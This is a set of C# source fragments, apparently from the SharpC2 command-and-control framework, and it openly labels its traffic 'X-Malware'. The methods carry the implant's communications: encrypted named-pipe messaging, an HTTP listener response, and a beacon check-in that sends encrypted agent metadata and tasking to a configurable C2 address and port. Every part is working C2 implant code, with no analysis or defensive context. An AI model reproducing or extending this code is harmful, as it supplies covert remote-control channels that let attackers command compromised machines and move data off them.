private void StartClient() { Task.Factory.StartNew(delegate() { while (ModuleStatus == ModuleStatus.Running) { Status.Reset(); var pipe = new NamedPipeClientStream(ConnectHost, Pipename, PipeDirection.InOut, PipeOptions.Asynchronous); pipe.Connect(5000); var outbound = new AgentMessage { Metadata = Metadata }; if (Outbound.Count > 0) { outbound = Outbound.Dequeue(); } var dataToSend = Crypto.Encrypt(outbound); pipe.BeginWrite(dataToSend, 0, dataToSend.Length, new AsyncCallback(ClientWriteCallback), pipe); Status.WaitOne(); Thread.Sleep(1000); } }); }
private void SendData(Socket handler, List <AgentMessage> messages) { var encrypted = CryptoController.Encrypt(messages); var response = new StringBuilder("HTTP/1.1 200 OK\r\n"); response.Append(string.Format("X-Malware: SharpC2\r\n")); response.Append(string.Format("Content-Length: {0}\r\n", encrypted.Length)); response.Append(string.Format("Date: {0}\r\n", DateTime.UtcNow.ToString("ddd, d MMM yyyy HH:mm:ss UTC"))); response.Append("\r\n"); var headers = Encoding.UTF8.GetBytes(response.ToString()); var dataToSend = new byte[encrypted.Length + headers.Length]; Buffer.BlockCopy(headers, 0, dataToSend, 0, headers.Length); Buffer.BlockCopy(encrypted, 0, dataToSend, headers.Length, encrypted.Length); try { handler.BeginSend(dataToSend, 0, dataToSend.Length, 0, new AsyncCallback(SendCallback), handler); } catch { // socket may be forcibly closed if agent dies } }
public virtual WebClient GetWebClient() { var client = new WebClient(); var metadata = Crypto.Encrypt(Metadata); client.Headers.Clear(); client.Headers.Add("X-Malware", "SharpC2"); client.Headers[HttpRequestHeader.Cookie] = $"Metadata={Convert.ToBase64String(metadata)}"; return(client); }
private void CheckIn() { var metadata = Crypto.Encrypt(Metadata); var client = GetWebClient(); client.Headers[HttpRequestHeader.Cookie] = string.Format("{0}={1}", "Metadata", Convert.ToBase64String(metadata)); AgentMessage message; Uri uri; byte[] outMessage; string dataToSend; if (Outbound.Count > 0) { message = Outbound.Dequeue(); outMessage = Crypto.Encrypt(message); dataToSend = $"Message={Convert.ToBase64String(outMessage)}"; uri = new Uri($"http://{ConnectAddress}:{ConnectPort}"); client.UploadDataAsync(uri, Encoding.UTF8.GetBytes(dataToSend)); } else { message = new AgentMessage { Metadata = Metadata, Data = new C2Data { AgentID = Metadata.AgentID, Module = "Core", Command = "AgentCheckIn" } }; outMessage = Crypto.Encrypt(message); dataToSend = $"Message={Convert.ToBase64String(outMessage)}"; uri = new Uri($"http://{ConnectAddress}:{ConnectPort}?{dataToSend}"); client.DownloadDataAsync(uri); } client.Dispose(); }
private void ServerReadCallback(IAsyncResult ar) { var state = ar.AsyncState as CommStateObject; var stream = state.Worker as NetworkStream; var bytesRead = 0; try { bytesRead = stream.EndRead(ar); } catch { } if (bytesRead > 0) { var data = DataJuggle(bytesRead, stream, state); if (Crypto.VerifyHMAC(data)) { var inbound = Crypto.Decrypt <AgentMessage>(data); if (inbound != null) { Inbound.Enqueue(inbound); } } AgentMessage outbound = new AgentMessage { Metadata = Metadata }; if (Outbound.Count > 0) { outbound = Outbound.Dequeue(); } var encrypted = Crypto.Encrypt(outbound); stream.BeginWrite(encrypted, 0, encrypted.Length, new AsyncCallback(ServerWriteCallback), stream); } }